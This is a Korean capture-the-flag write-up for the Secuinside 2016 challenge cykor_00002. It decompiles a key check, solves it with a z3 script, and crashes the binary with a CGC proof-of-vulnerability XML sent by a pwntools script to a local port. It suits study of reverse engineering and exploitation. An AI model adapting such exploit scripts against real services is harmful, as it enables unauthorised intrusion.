https://github.com/ctfs/write-ups-2016/tree/master/secuinside-ctf-quals-2016/cgc/cykor_00002-150
write up : https://ctf.rip/secuinside2016-cykor00002/
vagrant@crs:~$ ./cykor_00002
----------------------------------------
- Simple Echo System -
----------------------------------------
What is your name?
name: ADMIN
+ Gimme a key : aaaaaaaaaaaaaaa
Get out of here :( |
우선 실행하고 실행 된 내용 문자열을 기반으로 ida 분석을 진행 하도록 합시다.
int main_sub_8048F50()
{
char v1; // [esp+70h] [ebp-448h]@1
char v2; // [esp+B0h] [ebp-408h]@3
char v3; // [esp+B1h] [ebp-407h]@4
int v4; // [esp+4B0h] [ebp-8h]@1
v4 = 0;
sub_8049FC0("----------------------------------------\n");
sub_8049FC0("- Simple Echo System -\n");
sub_8049FC0("----------------------------------------\n");
sub_8049FC0("What is your name?\n");
sub_8048E90(&v1);
if ( sub_8048E10((int)&v1, (int)"ADMIN", 5u) )
{
sub_8049FC0("Hi %s\n");
sub_8049FC0(": ");
*(&v2 + sub_80480A0(&v2, 1000, 10)) = 0;
sub_8049FC0("%s\n");
}
else
{
sub_8049FC0("+ Gimme a key : ");
sub_80480A0(&01_byte_805F454, 27, 10);
if ( compare_key_sub_8048150() )
{
sub_8049FC0("Welcome Admin :)\n");
sub_8049FC0(": ");
sub_80480A0(&v2, 1000, 10);
if ( v2 == 'C' && v3 == 'K' )
MEMORY[0] = 10;
sub_8049FC0("%s\n");
}
else
{
sub_8049FC0("Get out of here :(\n");
}
}
return 0;
}
|
compare_key_sub_8048150() 를 확인 하면 특정 값을 맞춰야지, 통과할 수 있게 되어 있습니다.
_BOOL4 compare_key_sub_8048150()
{
signed int v1; // [esp+0h] [ebp-4h]@1
v1 = 0;
if ( 21_byte_805F468
+ 04_byte_805F457
+ 13_byte_805F460
+ 22_byte_805F469
+ 24_byte_805F46B
+ 08_byte_805F45B
+ 02_byte_805F455
+ 07_byte_805F45A
+ 10_byte_805F45D
+ 18_byte_805F465
+ 12_byte_805F45F
+ 19_byte_805F466
+ 06_byte_805F459 == 1068 )
v1 = 1;
if ( 11_byte_805F45E
+ 08_byte_805F45B
+ 10_byte_805F45D
+ 18_byte_805F465
+ 19_byte_805F466
+ 23_byte_805F46A
+ 03_byte_805F456
+ 02_byte_805F455
+ 14_byte_805F461
+ 16_byte_805F463 == 760 )
++v1;
if ( 15_byte_805F462
+ 02_byte_805F455
+ 10_byte_805F45D
+ 17_byte_805F464
+ 01_byte_805F454
+ 14_byte_805F461
+ 16_byte_805F463
+ 12_byte_805F45F
+ 13_byte_805F460
+ 21_byte_805F468
+ 06_byte_805F459
+ 23_byte_805F46A
+ 22_byte_805F469 == 997 )
++v1;
if ( 05_byte_805F458
+ 09_byte_805F45C
+ 20_byte_805F467
+ 22_byte_805F469
+ 02_byte_805F455
+ 07_byte_805F45A
+ 24_byte_805F46B
+ 14_byte_805F461
+ 17_byte_805F464
+ 13_byte_805F460 == 782 )
++v1;
if ( 20_byte_805F467
+ 11_byte_805F45E
+ 19_byte_805F466
+ 17_byte_805F464
+ 14_byte_805F461
+ 03_byte_805F456
+ 08_byte_805F45B
+ 07_byte_805F45A
+ 21_byte_805F468
+ 15_byte_805F462 == 778 )
++v1;
if ( 21_byte_805F468
+ 20_byte_805F467
+ 06_byte_805F459
+ 10_byte_805F45D
+ 05_byte_805F458
+ 15_byte_805F462
+ 23_byte_805F46A
+ 22_byte_805F469
+ 04_byte_805F457
+ 25_byte_805F46C
+ 13_byte_805F460
+ 24_byte_805F46B
+ 19_byte_805F466
+ 14_byte_805F461 == 1123 )
++v1;
if ( 23_byte_805F46A
+ 09_byte_805F45C
+ 06_byte_805F459
+ 14_byte_805F461
+ 16_byte_805F463
+ 12_byte_805F45F
+ 08_byte_805F45B
+ 11_byte_805F45E
+ 02_byte_805F455
+ 19_byte_805F466
+ 01_byte_805F454
+ 15_byte_805F462
+ 20_byte_805F467
+ 03_byte_805F456
+ 24_byte_805F46B == 1180 )
++v1;
if ( 06_byte_805F459
+ 25_byte_805F46C
+ 12_byte_805F45F
+ 24_byte_805F46B
+ 20_byte_805F467
+ 23_byte_805F46A
+ 01_byte_805F454
+ 05_byte_805F458
+ 04_byte_805F457
+ 09_byte_805F45C
+ 14_byte_805F461
+ 21_byte_805F468
+ 19_byte_805F466
+ 03_byte_805F456
+ 10_byte_805F45D
+ 18_byte_805F465
+ 08_byte_805F45B
+ 13_byte_805F460 == 1498 )
++v1;
if ( 19_byte_805F466
+ 24_byte_805F46B
+ 15_byte_805F462
+ 05_byte_805F458
+ 25_byte_805F46C
+ 02_byte_805F455
+ 01_byte_805F454
+ 22_byte_805F469
+ 06_byte_805F459
+ 17_byte_805F464
+ 08_byte_805F45B
+ 13_byte_805F460
+ 16_byte_805F463
+ 21_byte_805F468
+ 04_byte_805F457 == 1213 )
++v1;
if ( 18_byte_805F465
+ 22_byte_805F469
+ 10_byte_805F45D
+ 11_byte_805F45E
+ 07_byte_805F45A
+ 15_byte_805F462
+ 21_byte_805F468
+ 02_byte_805F455
+ 09_byte_805F45C
+ 25_byte_805F46C == 779 )
++v1;
if ( 01_byte_805F454
+ 04_byte_805F457
+ 20_byte_805F467
+ 03_byte_805F456
+ 24_byte_805F46B
+ 23_byte_805F46A
+ 16_byte_805F463
+ 21_byte_805F468
+ 05_byte_805F458 == 742 )
++v1;
if ( 16_byte_805F463
+ 24_byte_805F46B
+ 20_byte_805F467
+ 07_byte_805F45A
+ 18_byte_805F465
+ 11_byte_805F45E
+ 09_byte_805F45C
+ 05_byte_805F458
+ 06_byte_805F459
+ 12_byte_805F45F
+ 02_byte_805F455
+ 10_byte_805F45D
+ 15_byte_805F462
+ 04_byte_805F457
+ 21_byte_805F468 == 1196 )
++v1;
if ( 07_byte_805F45A
+ 02_byte_805F455
+ 09_byte_805F45C
+ 14_byte_805F461
+ 12_byte_805F45F
+ 25_byte_805F46C
+ 13_byte_805F460
+ 22_byte_805F469
+ 19_byte_805F466
+ 24_byte_805F46B
+ 15_byte_805F462
+ 16_byte_805F463
+ 23_byte_805F46A
+ 18_byte_805F465 == 1091 )
++v1;
if ( 22_byte_805F469
+ 18_byte_805F465
+ 23_byte_805F46A
+ 01_byte_805F454
+ 05_byte_805F458
+ 02_byte_805F455
+ 19_byte_805F466
+ 20_byte_805F467
+ 13_byte_805F460 == 764 )
++v1;
if ( 14_byte_805F461
+ 17_byte_805F464
+ 23_byte_805F46A
+ 02_byte_805F455
+ 12_byte_805F45F
+ 25_byte_805F46C
+ 18_byte_805F465
+ 15_byte_805F462
+ 11_byte_805F45E
+ 05_byte_805F458
+ 09_byte_805F45C
+ 08_byte_805F45B
+ 01_byte_805F454
+ 19_byte_805F466
+ 07_byte_805F45A
+ 22_byte_805F469
+ 21_byte_805F468
+ 10_byte_805F45D == 1463 )
++v1;
if ( 16_byte_805F463 + 09_byte_805F45C + 02_byte_805F455 + 12_byte_805F45F + 22_byte_805F469 + 20_byte_805F467 == 465 )
++v1;
if ( 17_byte_805F464
+ 19_byte_805F466
+ 12_byte_805F45F
+ 25_byte_805F46C
+ 05_byte_805F458
+ 20_byte_805F467
+ 13_byte_805F460
+ 02_byte_805F455
+ 07_byte_805F45A
+ 14_byte_805F461
+ 01_byte_805F454
+ 22_byte_805F469 == 955 )
++v1;
if ( 07_byte_805F45A
+ 08_byte_805F45B
+ 22_byte_805F469
+ 19_byte_805F466
+ 01_byte_805F454
+ 10_byte_805F45D
+ 15_byte_805F462
+ 18_byte_805F465 == 654 )
++v1;
if ( 02_byte_805F455
+ 03_byte_805F456
+ 17_byte_805F464
+ 13_byte_805F460
+ 24_byte_805F46B
+ 01_byte_805F454
+ 11_byte_805F45E
+ 07_byte_805F45A
+ 21_byte_805F468
+ 19_byte_805F466
+ 23_byte_805F46A
+ 08_byte_805F45B
+ 16_byte_805F463 == 1030 )
++v1;
if ( 23_byte_805F46A + 24_byte_805F46B + 12_byte_805F45F == 275 )
++v1;
if ( 22_byte_805F469
+ 04_byte_805F457
+ 02_byte_805F455
+ 21_byte_805F468
+ 01_byte_805F454
+ 09_byte_805F45C
+ 13_byte_805F460 == 563 )
++v1;
if ( 15_byte_805F462 + 06_byte_805F459 + 12_byte_805F45F + 19_byte_805F466 + 18_byte_805F465 + 25_byte_805F46C == 509 )
++v1;
if ( 20_byte_805F467
+ 11_byte_805F45E
+ 13_byte_805F460
+ 22_byte_805F469
+ 17_byte_805F464
+ 25_byte_805F46C
+ 15_byte_805F462 == 556 )
++v1;
if ( 02_byte_805F455
+ 13_byte_805F460
+ 22_byte_805F469
+ 20_byte_805F467
+ 19_byte_805F466
+ 03_byte_805F456
+ 04_byte_805F457
+ 12_byte_805F45F
+ 16_byte_805F463
+ 24_byte_805F46B
+ 23_byte_805F46A
+ 18_byte_805F465
+ 25_byte_805F46C
+ 09_byte_805F45C
+ 06_byte_805F459
+ 11_byte_805F45E
+ 21_byte_805F468
+ 17_byte_805F464 == 1464 )
++v1;
if ( 15_byte_805F462
+ 22_byte_805F469
+ 08_byte_805F45B
+ 23_byte_805F46A
+ 21_byte_805F468
+ 06_byte_805F459
+ 17_byte_805F464
+ 11_byte_805F45E
+ 12_byte_805F45F == 758 )
++v1;
return v1 == 25;
} |
여기에 있는 변수를 다음과 같이 치환하여 python의 수학 라이브러리인 z3 라이브러리를 활용 하여 맞는 값을 찾습니다.
(※ z3 : https://github.com/Z3Prover/z3)
babyhack@ubuntu:~$ python scripts/mk_make.py --python --pypkgdir=/usr/lib/python2.7/dist-packages
babyhack@ubuntu:~$ cd ./build/make; sudo make install
|
z3가 준비 되었다면, 다음의 코드를 사용하면 됩니다.
from z3 import *
var_0 = Int('var_0')
var_1 = Int('var_1')
var_2 = Int('var_2')
var_3 = Int('var_3')
var_4 = Int('var_4')
var_5 = Int('var_5')
var_6 = Int('var_6')
var_7 = Int('var_7')
var_8 = Int('var_8')
var_9 = Int('var_9')
var_10 = Int('var_10')
var_11 = Int('var_11')
var_12 = Int('var_12')
var_13 = Int('var_13')
var_14 = Int('var_14')
var_15 = Int('var_15')
var_16 = Int('var_16')
var_17 = Int('var_17')
var_18 = Int('var_18')
var_19 = Int('var_19')
var_20 = Int('var_20')
var_21 = Int('var_21')
var_22 = Int('var_22')
var_23 = Int('var_23')
var_24 = Int('var_24')
var_25 = Int('var_25')
solve(var_20 + var_3 + var_12 + var_21 + var_23 + var_7 + var_1 + var_6 + var_9 + var_17 + var_11 + var_18 + var_5 == 1068,var_10 + var_7 + var_9 + var_17 + var_18 + var_22 + var_2 + var_1 + var_13 + var_15 == 760,var_14 + var_1 + var_9 + var_16 + var_0 + var_13 + var_15 + var_11 + var_12 + var_20 + var_5 + var_22 + var_21 == 997,var_4 + var_8 + var_19 + var_21 + var_1 + var_6 + var_23 + var_13 + var_16 + var_12 == 782,var_19 + var_10 + var_18 + var_16 + var_13 + var_2 + var_7 + var_6 + var_20 + var_14 == 778,var_20 + var_19 + var_5 + var_9 + var_4 + var_14 + var_22 + var_21 + var_3 + var_24 + var_12 + var_23 + var_18 + var_13 == 1123,var_22 + var_8 + var_5 + var_13 + var_15 + var_11 + var_7 + var_10 + var_1 + var_18 + var_0 + var_14 + var_19 + var_2 + var_23 == 1180,var_5 + var_24 + var_11 + var_23 + var_19 + var_22 + var_0 + var_4 + var_3 + var_8 + var_13 + var_20 + var_18 + var_2 + var_9 + var_17 + var_7 + var_12 == 1498,var_18 + var_23 + var_14 + var_4 + var_24 + var_1 + var_0 + var_21 + var_5 + var_16 + var_7 + var_12 + var_15 + var_20 + var_3 == 1213,var_17 + var_21 + var_9 + var_10 + var_6 + var_14 + var_20 + var_1 + var_8 + var_24 == 779,var_0 + var_3 + var_19 + var_2 + var_23 + var_22 + var_15 + var_20 + var_4 == 742,var_15 + var_23 + var_19 + var_6 + var_17 + var_10 + var_8 + var_4 + var_5 + var_11 + var_1 + var_9 + var_14 + var_3 + var_20 == 1196,var_6 + var_1 + var_8 + var_13 + var_11 + var_24 + var_12 + var_21 + var_18 + var_23 + var_14 + var_15 + var_22 + var_17 == 1091,var_21 + var_17 + var_22 + var_0 + var_4 + var_1 + var_18 + var_19 + var_12 == 764,var_13 + var_16 + var_22 + var_1 + var_11 + var_24 + var_17 + var_14 + var_10 + var_4 + var_8 + var_7 + var_0 + var_18 + var_6 + var_21 + var_20 + var_9 == 1463,var_15 + var_8 + var_1 + var_11 + var_21 + var_19 == 465,var_16 + var_18 + var_11 + var_24 + var_4 + var_19 + var_12 + var_1 + var_6 + var_13 + var_0 + var_21 == 955,var_6 + var_7 + var_21 + var_18 + var_0 + var_9 + var_14 + var_17 == 654,var_1 + var_2 + var_16 + var_12 + var_23 + var_0 + var_10 + var_6 + var_20 + var_18 + var_22 + var_7 + var_15 == 1030,var_22 + var_23 + var_11 == 275,var_21 + var_3 + var_1 + var_20 + var_0 + var_8 + var_12 == 563,var_14 + var_5 + var_11 + var_18 + var_17 + var_24 == 509,var_19 + var_10 + var_12 + var_21 + var_16 + var_24 + var_14 == 556,var_1 + var_12 + var_21 + var_19 + var_18 + var_2 + var_3 + var_11 + var_15 + var_23 + var_22 + var_17 + var_24 + var_8 + var_5 + var_10 + var_20 + var_16 == 1464,var_14 + var_21 + var_7 + var_22 + var_20 + var_5 + var_16 + var_10 + var_11 == 758) |
[ result ]
babyhack@ubuntu:~/tmp/Secuinside/2016$ python exp.py
[var_16 = 89,
var_23 = 85,
var_20 = 82,
var_1 = 72,
var_6 = 69,
var_12 = 77,
var_15 = 51,
var_19 = 85,
var_22 = 95,
var_21 = 78,
var_5 = 77,
var_14 = 78,
var_11 = 95,
var_9 = 72,
var_3 = 87,
var_10 = 69,
var_17 = 95,
var_4 = 95,
var_7 = 95,
var_8 = 84,
var_2 = 79,
var_13 = 48,
var_18 = 84,
var_24 = 80,
var_0 = 83]
babyhack@ubuntu:~/tmp/Secuinside/2016$ |
10진수로 표시 되기 때문에 문자로 표시 하는 코드를 작성 해야 한다.
[ covert ]
babyhack@ubuntu:~/tmp/Secuinside/2016$ cat sort.py
var_16 = 89
var_23 = 85
var_20 = 82
var_1 = 72
var_6 = 69
var_12 = 77
var_15 = 51
var_19 = 85
var_22 = 95
var_21 = 78
var_5 = 77
var_14 = 78
var_11 = 95
var_9 = 72
var_3 = 87
var_10 = 69
var_17 = 95
var_4 = 95
var_7 = 95
var_8 = 84
var_2 = 79
var_13 = 48
var_18 = 84
var_24 = 80
var_0 = 83
print chr(var_0)+chr(var_1)+chr(var_2)+chr(var_3)+chr(var_4)+chr(var_5)+chr(var_6)+chr(var_7)+chr(var_8)+chr(var_9)+chr(var_10)+chr(var_11)+chr(var_12)+chr(var_13)+chr(var_14)+chr(var_15)+chr(var_16)+chr(var_17)+chr(var_18)+chr(var_19)+chr(var_20)+chr(var_21)+chr(var_22)+chr(var_23)+chr(var_24)
babyhack@ubuntu:~/tmp/Secuinside/2016$
|
[ result ]
babyhack@ubuntu:~/tmp/Secuinside/2016$ python sort.py
SHOW_ME_THE_M0N3Y_TURN_UP
babyhack@ubuntu:~/tmp/Secuinside/2016$
|
이제 찾은 내용을 테스트 해 보도록 합시다.
vagrant@crs:~$ ./cykor_00002
----------------------------------------
- Simple Echo System -
----------------------------------------
What is your name?
name: ADMIN
+ Gimme a key : HOW_ME_THE_M0N3Y_TURN_UP
Get out of here :(
vagrant@crs:~$ ./cykor_00002
----------------------------------------
- Simple Echo System -
----------------------------------------
What is your name?
name: SHOW_ME_THE_M0N3Y_TURN_UP
Hi SHOW_ME_THE_M0N3Y_TURN_UP
:
vagrant@crs:~$
vagrant@crs:~$ ./cykor_00002
----------------------------------------
- Simple Echo System -
----------------------------------------
What is your name?
name: ADMIN
+ Gimme a key : SHOW_ME_THE_M0N3Y_TURN_UP
Welcome Admin :)
: CK
Segmentation fault (core dumped)
vagrant@crs:~$
|
CGC에 전달하는 코드 작성은 예제 코드를 기반으로 XML 작성 합니다.
<!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd">
<pov>
<cbid>service</cbid>
<replay>
// recv
<read><delim>\x0a</delim><match><data>----------------------------------------\x0a</data></match></read>
<read><delim>\x0a</delim><match><data>- Simple Echo System -\x0a</data></match></read>
<read><delim>\x0a</delim><match><data>----------------------------------------\x0a</data></match></read>
<read><delim>\x0a</delim><match><data>What is your name?\x0a</data></match></read>
<read><delim>\x0a</delim><match><data>name: \x0a</data></match></read>
// send
<write><data>ADMIN\x0a</data></write>
// recv
<read><delim>\x0a</delim><match><data>+ Gimme a key : \x0a</data></match></read>
// send
<write><data>SHOW_ME_THE_M0N3Y_TURN_UP\x0a</data></write>
// recv
<read><delim>\x0a</delim><match><data>Welcome Admin :)\x0a</data></match></read>
<read><delim>\x0a</delim><match><data>: \x0a</data></match></read>
// send
<write><data>CK\x0a</data></write>
</replay>
</pov> |
exploit 코드는 다음과 같습니다.
#!/usr/bin/python
from pwn import *
xml_name = "pov.xml"
host, port = "127.0.0.1", 1234
r = remote(host,port)
print r.recvline()
r.sendline("XML")
payload = open(xml_name,'rb').read()
print r.recvline()
r.sendline(str(len(payload)))
print r.recvline()
r.sendline(payload)
r.interactive() |